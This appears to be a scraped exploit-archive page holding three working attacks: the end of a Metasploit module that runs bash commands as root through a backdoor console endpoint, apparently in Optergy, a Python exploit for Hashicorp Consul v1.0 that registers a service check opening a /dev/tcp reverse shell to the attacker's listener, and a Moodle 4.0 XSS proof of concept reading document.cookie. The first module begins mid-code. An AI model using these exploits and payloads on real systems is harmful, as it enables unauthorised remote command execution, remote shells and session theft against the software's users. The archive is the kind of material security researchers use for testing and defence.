Make MD5 hash from SHA1 hash<br /> h2 = Digest::MD5.hexdigest h1<br /> # Combine MD5 hash and SHA1 hash as answer (response) to the challenge<br /> answer = h1 + h2<br /> end<br /><br /> # Step 2: execute payload (RCE) using the backdoor and challenge response obtained from step 1.<br /> if target['Type'] == :linux_dropper<br /> cmd = cmd.gsub(' ') { '${IFS}' }<br /> end<br /><br /> if datastore['SUDO']<br /> payload = "sudo bash -c #{cmd}"<br /> else<br /> payload = "bash -c #{cmd}"<br /> end<br /><br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, '/tools/ajax/ConsoleResult.html'),<br /> 'ctype' => 'application/x-www-form-urlencoded',<br /> 'vars_post' => {<br /> 'command' => payload,<br /> 'challenge' => challenge,<br /> 'answer' => answer<br /> }<br /> })<br /> if res.nil? || (res.code != 200)<br /> return nil<br /> else<br /> # get result and return the command response<br /> res_json = res.get_json_document<br /> return nil if res_json.nil? || res_json.blank?<br /><br /> res_cmd_output = res_json['response']['message']<br /> return res_cmd_output<br /> end<br /> end<br /><br /> # Checking if the target is vulnerable by executing the whoami command via the backdoor<br /> def check<br /> res = execute_command('whoami')<br /> return Exploit::CheckCode::Safe unless res && (res.chomp == 'root' || res.chomp == 'optergy')<br /><br /> Exploit::CheckCode::Vulnerable<br /> end<br /><br /> def exploit<br /> print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")<br /> case target['Type']<br /> when :unix_cmd<br /> res = execute_command(payload.encoded)<br /> fail_with(Failure::PayloadFailed, "#{datastore['PAYLOAD']} failed.") if res.nil?<br /> when :linux_dropper<br /> # Don't check the response here since the server won't respond<br /> # if the payload is successfully executed.<br /> execute_cmdstager<br /> end<br /> end<br />end<br /></code></pre>
<pre><code># Exploit Title: Hashicorp Consul v1.0 - Remote Command Execution (RCE)<br /># Date: 26/10/2022<br /># Exploit Author: GatoGamer1155, 0bfxgh0st<br /># Vendor Homepage: https://www.consul.io/<br /># Description: Exploit for gain reverse shell on Remote Command Execution via API<br /># References: https://www.consul.io/api/agent/service.html<br /># Tested on: Ubuntu Server<br /># Software Link: https://github.com/hashicorp/consul<br /><br />import requests, sys<br /><br />if len(sys.argv) < 6:<br /> print(f"\n[\033[1;31m-\033[1;37m] Usage: python3 {sys.argv[0]} <rhost> <rport> <lhost> <lport> <acl_token>\n")<br /> exit(1)<br /><br />target = f"http://{sys.argv[1]}:{sys.argv[2]}/v1/agent/service/register"<br />headers = {"X-Consul-Token": f"{sys.argv[5]}"}<br />json = {"Address": "127.0.0.1", "check": {"Args": ["/bin/bash", "-c", f"bash -i >& /dev/tcp/{sys.argv[3]}/{sys.argv[4]} 0>&1"], "interval": "10s", "Timeout": "864000s"}, "ID": "gato", "Name": "gato", "Port": 80}<br /><br />try:<br /> requests.put(target, headers=headers, json=json)<br /> print("\n[\033[1;32m+\033[1;37m] Request sent successfully, check your listener\n")<br />except:<br /> print("\n[\033[1;31m-\033[1;37m] Something went wrong, check the connection and try again\n")<br /><br /></code></pre>
<pre><code># Exploit Title: Moodle LMS 4.0 - Cross-Site Scripting (XSS)<br /># Date: 26/10/2022<br /># Exploit Author: Saud Alenazi<br /># Vendor Homepage: https://moodle.org/<br /># Software Link: https://git.in.moodle.com/moodle<br /># Version: 4.0<br /># Tested on: XAMPP, Windows 10<br /># Contact: https://twitter.com/dmaral3noz<br /><br />Description:<br /><br />A Cross Site Scripting (XSS) vulnerability exists in Moodle is a free and open-source Learning Management System (LMS) written in PHP and distributed under the GNU General Public License<br /><br />Vulnerable Code:<br /><br />line 111 in file "course/search.php"<br /><br />echo $courserenderer->search_courses($searchcriteria);<br /><br /><br />Steps to exploit:<br />1) Go to http://localhost/course/search.php<br />2) Insert your payload in the "search"<br /><br />Proof of concept (Poc):<br />The following payload will allow you to run the javascript -<br />"><img src=# onerror=alert(document.cookie)><br /><br /></code></pre>